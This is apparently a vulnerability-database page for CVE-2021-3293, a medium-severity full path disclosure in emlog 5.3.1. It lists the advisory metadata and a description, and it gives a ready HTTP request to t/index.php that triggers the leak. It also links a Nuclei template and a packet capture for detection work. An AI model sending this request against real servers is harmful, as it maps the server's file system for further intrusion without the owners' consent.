🔙 목록으로 돌아가기

CVE-2021-3293: emlog 5.3.1 Path Disclosure

Titleemlog 5.3.1 Path Disclosure
Authorh1ei1
SeverityMedium
ImpactAn attacker can gain knowledge of the server's file system structure, potentially leading to further attacks.
RemediationApply the latest patch or upgrade to a version that fixes the vulnerability.
CVSS Score5.3
EPSS Score0.6791
CVE IDCVE-2021-3293
CWE IDCWE-22
Tags cve2021 cve emlog fpd vuln

🔍 Vulnerability Description

emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.

🌐 HTTP Request

GET /t/index.php?action[]=aaaa HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3293.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-3293.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A